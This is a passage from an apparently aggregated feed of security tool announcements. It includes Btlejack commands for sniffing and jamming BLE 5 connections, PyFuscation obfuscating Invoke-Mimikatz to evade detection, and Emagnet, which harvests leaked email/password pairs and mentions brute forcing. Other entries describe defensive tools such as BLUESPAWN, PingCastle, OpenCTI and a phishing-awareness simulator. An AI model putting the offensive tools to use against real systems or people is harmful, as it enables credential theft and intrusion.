$ btlejack -f 0x11223344 -5
Btlejack will then recover the channel map used and then the hop interval value:
$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160
It will then try to recover this connection PRNG counter value:
$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160
✓ CSA2 PRNG counter = 5137
[i] Synchronized, packet capture in progress ...
Once done, Btlejack is synchronized with this connection and will process packets as usual.


Jamming an existing BLE 5 connection
Nothing new here, except that you must specify that you are attacking a BLE 5 connection, by using the -5 option.
Please note that you can optimize this attack by also specifying the channel map and hop interval value to use, by using respectively the -m and -p flags. Both of them MUST be provided, unless it would not work.


Hijacking an existing BLE 5 connection
I did not manage to hijack a BLE 5 connection at this time, as this attack is time-sensitive. My BLE 5 devices use a latency of 0, thus allowing no delay and causing this attack to fail.
When I will get my hands on some legitimate BLE 5 devices, I will improve this.


PyFuscation - Obfuscate Powershell Scripts By Replacing Function Names, Variables And Parameters

$
0
0

PyFuscation
Requires python3

usage: PyFuscation.py [-h] [-f] [-v] [-p] [--ps SCRIPT]
Optional arguments:
• -h, --help show this help message and exit

• -f Obfuscate functions
○ Do this First ... Its probably the most likely to work well

• -v Obfuscate variables
○ If your going to obfuscate variables do the parameters too.

• -p Obfuscate parameters
○ If your going to obfuscate parameters do the variables too.
Required arguments: --ps <SCRIPT> Obfuscate PowerShell script
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1 


EMAGNET - Tool For Find Leaked Databases With 97.1% Accurate To Grab Mail + Password Together From Pastebin Leaks

$
0
0

Emagnet is a very powerful tool for it's purpose wich is to capture email addresses and passwords from leaked databases uploaded on pastebin. It's almost impossible to find leaked passwords when they are out of list on pastebin.com. Either they have been deleted by pastebin's techs or the uploads is just one in the crowd. To be honest it's easier to find a needle in a haystack then find outdated uploads on pastebin with the data we want to collect.

Known Issues That Will Be Fixed In Next Push!
  • SSH Bruterforcer isn't completely working anymore
  • Requirements packages for android devices when using termux app isnt working with brute force tools + screen
  • Sending wrong data into emagnet.log for wich files that contains correct data

Demo - How it works

Left side is how you see it - Right side is what actually happening in the background



Of course everything getting stored to log dir (Filtered email addresses)


Here's how it works in reality.



Get Started On Linux/MacOSX
git clone https://github.com/wuseman/emagnet
cd emagnet
chmod +x emagnet*
.
./emagnet --emagnet

Get Started On Windows 10
Please visit my installation wiki for more info (includes a video)

Now your patience is the key to success! :-)

Wiki Sections:
  • About - How everything started.
  • Previews - Previews can be found here.
  • Faq - How to grab your visa card if it has been leaked. Also get answers why we not using TOR.
  • Installation - Video preview for how to get started on windows
  • Wiki - How To Find your facebook credenticals, if it has been leaked.
  • Tips & Tricks - Get started with spotify brute forcing - How emagnet will work with your openvpn files.

System requirements
  • Bash - Find more info about bashhere
  • Wget - Find more info about wgethere
  • Curl - Find more info about curlhere

BBC NEWS: "Pastebin: Running the site where hackers publicise their attacks"
  • Emagnet is your best friend for get the leaks

Changelog
Versions changelog.

Authors:

Greetings:
m1st that deliver legit leaks for us daily.
And to all ppl that is trying to sell public leaks and steal the real hackers job, f*ck you! This is one reason why I started this project, I hope this project will get widely spreaded so you will earn 0.00$ on your re-edited malware shit!
Cheers!

Emagnet is a private project since 2015 and was released in June @ 2018, to be continued.


BLUESPAWN - Windows Based Active Defense Tool To Empower Blue Teams

$
0
0

BLUESPAWN helps blue teams monitor Windows systems in real-time against active attackers by detecting anomalous activity

Why we made BLUESPAWN
We've created and open-sourced this for a number of reasons which include the following:
  • Move Faster: We wanted tooling specifically designed to quickly identify malicious activity on a system
  • Know our Coverage: We wanted to know exactly what our tools could detect and not rely on blackbox software as much (ie AV programs). This approach will help us to better focus our efforts on specific lines of effort and have confidence in the status of others.
  • Better Understanding: We wanted to better understand the Windows attack surface in order to defend it better
  • More Open-Source Blue Team Software: While there are many open-source Red Team Tools out there, the vast majority of some of the best Blue Team tools are closed-source (ie, AVs, EDRs, SysInternals, etc). We shouldn't need to rely on security through obscurity to prevent malicious actors (obviously very difficult, but something to strive for!)
  • Demonstrate Features of Windows API: We combed through a ton of Microsoft Documentation, StackOverflow Answers, and more to create this. Hopefully others may find some of the code useful.

Coverage of MITRE ATT&CK
Visit this map to see current coverage capabilities

Lines of Effort
BLUESPAWN consists of 5 major modules as listed below. Several of these modules have submodules (which may not be created in the codebase yet) as listed below and all are in varying stages of planning, research, and development.
  • Hunt
    • Configuration & Settings
    • File System
    • Hunts
    • Processes
  • Monitor
    • ETW
    • File Monitor
    • Process Monitor
    • Registry Monitor
    • User Hooking
  • React
    • Reactions
  • BLUESPAWN (Program main)
  • Logging

Project Authors
Made with love by the UVA Cyber Defense Team Windows Group

Contributors
Thanks to all of the folks listed below for their contributions to BLUESPAWN!
  • Your name here!
Want to help? Take a look at the current issues, add ideas for new features, write some code, and create a pull request!

Special Thanks
We would like to provide a special thank you to the following projects that have helped us to build BLUESPAWN:
  • The MITRE's ATT&CK Project which has put together an amazing framework for which to consider, document, and categorize attacker tradercraft.
  • Microsoft's documentation and examples on the Windows API
  • The Japan Computer Emergency Response Team (JPCERT)'s Tool Analysis Result Sheet for its documentation of attacker behavior and correlation with detection opportunities.



Mondoo - Cloud-Native Security And Vulnerability Risk Management

$
0
0

Quick Start
Install mondoo:
Workstation
export MONDOO_REGISTRATION_TOKEN='changeme'
curl -sSL http://mondoo.io/download.sh | bash
Service
export MONDOO_REGISTRATION_TOKEN='changeme'
curl -sSL http://mondoo.io/install.sh | bash
For other installation methods, have a look at our documentation.
Run a scan:
# scan a docker image from remote registry
mondoo vuln -t docker://centos:7

# scan docker container (get ids from docker ps)
mondoo vuln -t docker://00fa961d6b6a

# scan a ssh instance
mondoo vuln -t ssh://ec2-user@54.76.229.223

Repository Structure
Mondoo Deployment
Mondoo Integration
Examples
Docs


PingCastle - Get Active Directory Security At 80% In 20% Of The Time

$
0
0

The risk level regarding Active Directory security has changed. Several vulnerabilities have been made popular with tools like mimikatz or sites likes adsecurity.org.
Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.
  |:.      PingCastle (Version 2.5.2.0)
| #:. Get Active Directory Security at 80% in 20% of the time
# @@ > End of support: 31/07/2020
| @@@:
: .# Vincent LE TOUX (contact@pingcastle.com)
.: https://www.pingcastle.com
Using interactive mode.
Do not forget that there are other command line switches like --help that you can use
What you would like to do?
1-healthcheck-Score the risk of a domain
2-graph -Analyze admin groups and delegations
3-conso -Aggregate multiple reports into a single one
4-nullsession-Perform a specific security check
5-carto -Build a map of all interconnected domains
6-scanner -Perform specific security checks on workstations
Check https://www.pingcastle.com for the documentation and methodology

Build
PingCastle is a c# project which can be build from Visual Studio 2012 to Visual Studio 2017

Support & lifecycle
For support requests, you should contact support@pingcastle.com The support for the basic edition is made on a best effort basis and fixes delivered when a new version is delivered.
The Basic Edition of PingCastle is released every 6 months (January, August) and this repository is updated at each release.
If you need changes, please contact contact@pingcastle.com for support packages.

Author
Author: Vincent LE TOUX
You can contact me at vincent.letoux@gmail.com


Phishing-Simulation - Aims To Increase Phishing Awareness By Providing An Intuitive Tutorial And Customized Assessment

$
0
0

Phishing Simulation mainly aims to increase phishing awareness by providing an intuitive tutorial and customized assessment (without any actual setup - no domain, no infrastructure, no actual email address) to assess people's action on any given situation and gives ability to understand what is the current awareness posture

What?
  • One of the objective of organizations carrying out red team assessment is to know the weakness in the IT ecosystem which includes people and network. Organization takes every effort to improve there perimeter security and patch the vulnerabilities found but the people remains the weakest link. Phishing plays vital role in understanding the security-awareness of employee.
  • Phishing Simulation enables user to understand it without actually performing the 'live' phishing attack, by leveraging the engaging and intuitive training sessions.
  • Tool will give you a customized environment to design your test as per your requirements which make questions tailor-made for every organization and unique for each person, close to real-time phishing attack, targeted and difficult to answer, but all of this without any actual setup. Once test is designed all the targeted audience can take the assessment and submit there answers. We will have a analysis at the end of campaign to understand the current awareness posture.
  • All it takes is just one click! So this will make us think twice before we do that one click.

Why?
  • While doing red team assessment it is a daunting task to set up entire phishing campaign. Decide a domain, buy it, setup a phishing website, design an email and choose target audience track the clicks to only know who all clicked them and there awareness.
  • This will need time and expertise to set-up.
  • Tool will help you do all this for you just with few clicks (And those clicks are legit and helps you :))
  • People are the most unpredictable one's and this tool will help you to know them and pattern of there clicks.

Features and How to use
Tool have mainly 2 modules:
  1. Admin Module : Which has access to setup test and view analysis, can be accessed at at http://localhost/AdminPanel/login.php, default login credentials are admin/admin
  2. Client Module : Which only has access to tutorial and assessment, can be accessed at http://localhost/phishClient/
  • Tutorial (Client Module)
    • This will have a tutorial book which introduces phishing and the general techniques used which will create awareness and educate.
  • Assessment (Client Module)
    • This will include various questions which can be phishing emails or phishing site or scenario and user will have to choose there action whether they will click it, ignore it or report it.
    • Questions will be different for each user even under a same test code.
    • Questions will have a fair mix of positive and negative questions.
    • To pass the test all answers has to be right because all it takes is just one click!
  • Set up test (Admin Module)
    • Tool will ask for some basic information from you here. To name a few,
      • Domain Name : Here you will enter your legit domain and tool will create a set of look-a-like domains that adversaries can use to attack you.You can choose one of them which will be used during your phishing simulation assessment.
      • URL : Here you will enter your popularly used websites URI, and we will be creating a similar looking phishing website which will be shown under your chosen look-a-like domain to create real life scenario also known as 'Typosquatting' during assessment.
      • Test Code: You can create a test code for each department and create different test config for them so everyone gets a different phishing sites making assessment even harder. Even under the same test set of questions will be different for each employee.
      • Preview: You can preview the look and feel of the phishing webpage which we have created look-a-like to your original site.
      • Email Id: Here you should add an official email id which is generally used for mass communication and we will generate more such combination of email-ids and use them during assessment.
  • Analysis (Admin Module)
    • This will have a graph of analysis of different scenarios based on the pattern in which employees has answered the questions.
    • This will help to know the current awareness posture of organization.

Benefits
  • This will eliminate the need to set up entire phishing campaign manually and 'live' phishing environment.
  • Assessment is customized, which will make it targeted attack for target user.
  • An intuitive and interactive interface to exercise the entire process.
  • No need to have pen-tester or consultant to carryout phishing campaign, you can do it yourself with few clicks.
  • Know your people and make them aware.

Installation Guidelines

Docker
To be updated soon

Manual Installation for Windows (similar should be applicable to Linux)
  1. Download XAMPP from - https://www.apachefriends.org/download.html and follow installation flow on the screen. It will install webserver and MySQL for you.
  2. If you do not want to go with XAMPP, any webserver you may have and independent installation of MySQL should suffice.
  3. Once you have completed Step 1 or Step 2 depending on your choice, on XAMPP control panel start 'Apache' and 'MySQL' service.
  4. Open http://localhost/phpmyadmin/ or http://IP/phpmyadmin/ on the browser.
  5. Click on 'Databases' create database with name 'phishadmin'
  6. Click on 'Import' and import the file attached here with code, under /sql/ folder phishadmin.sql
  7. Copy the source code available here under C:\xampp\htdocs\ folder (path will vary for linux users) and you are done with setup.
Refer section 'How to use' for usability.
(i) Admin Module - http://localhost/AdminPanel/login.php, default login credentials are admin/admin. (ii)Client Module - http://localhost/phishClient/


BlackArch Linux v2019.09.01 - Penetration Testing Distribution

$
0
0

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 2336tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:
  • added more than 150 new tools
  • added terminus font for all WMs (thanks to psf for i3-wm bugfixes)
  • included linux kernel 5.2.9
  • new ~/.vim and ~/.vimrc (thanks to noptrix offering his config files)
  • updated blackarch-installer to v1.1.19
  • various improvements and bugfixes
  • removed dwm window manager
  • replaced the default terminal xterm with rxvt-unicode
  • updated look&feel: new BlackArch theme for WMs, grub, syslinux, etc. (special thanks to Erik!)
  • QA'ed and fixed all packages (runtime exec).
  • updated all blackarch tools and packages including config files
  • updated all system packages
  • updated all window manager menus (awesome, fluxbox, openbox)

Download and Installation

BlackArch Linux only takes a moment to setup.
There are three ways to go:
  1. Install on an existing Arch machine.
  2. Use the live ISO.
  3. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk.


OpenCTI - Open Cyber Threat Intelligence Platform

$
0
0

OpenCTI is an open source platform allowing organizations to manage their cyber threat intelligence knowledge and observables. It has been created in order to structure, store, organize and visualize technical and non-technical information about cyber threats.
The structuration of the data is performed using a knowledge schema based on the STIX2 standards. It has been designed as a modern web application including a GraphQL API and an UX oriented frontend. Also, OpenCTI can be integrated with other tools and applications such as MISP, TheHive, MITRE ATT&CK, etc.


Objective
The goal is to create a comprehensive tool allowing users to capitalize technical (such as TTPs and observables) and non-technical information (such as suggested attribution, victimlogy etc.) while linking each piece of information to its primary source (a report, a MISP event, etc.), with features such as links between each information, first and last seen dates, levels of confidence etc. The tool is able to use the MITRE ATT&CK framework (through a dedicated connector) to help structure the data. The user can also chose to implement its own datasets.
Once data has been capitalized and processed by the analysts within OpenCTI, new relations may be inferred from existing ones to facilitate the understanding and the representation of this information. This allow the user to extract and leverage meaningful knowledge from the raw data.
OpenCTI not only allows imports but also exports of data under different formats (CSV, STIX2 bundles, etc.). Connectors are currently developped to accelerate interactions between the tool and other platforms.

Documentation and demonstration
If you want to know more on OpenCTI, you can read the documentation on the tool. If you wish to discover how the OpenCTI platform is working, a demonstration instance is available and open to everyone. This instance is reset every night and is based on reference data maintened by the OpenCTI developers.

Releases download
The releases are available on the Github releases page. You can also access to the rolling release package generated from the mater branch of the repository.

Installation
All you need to install the OpenCTI platform can be found in the official documentation. For installation, you can:

About
OpenCTI is a product powered by the collaboration of the French national cybersecurity agency (ANSSI), the CERT-EU and the Luatix non-profit organization.


Viewing all 5846 articles
Browse latest View live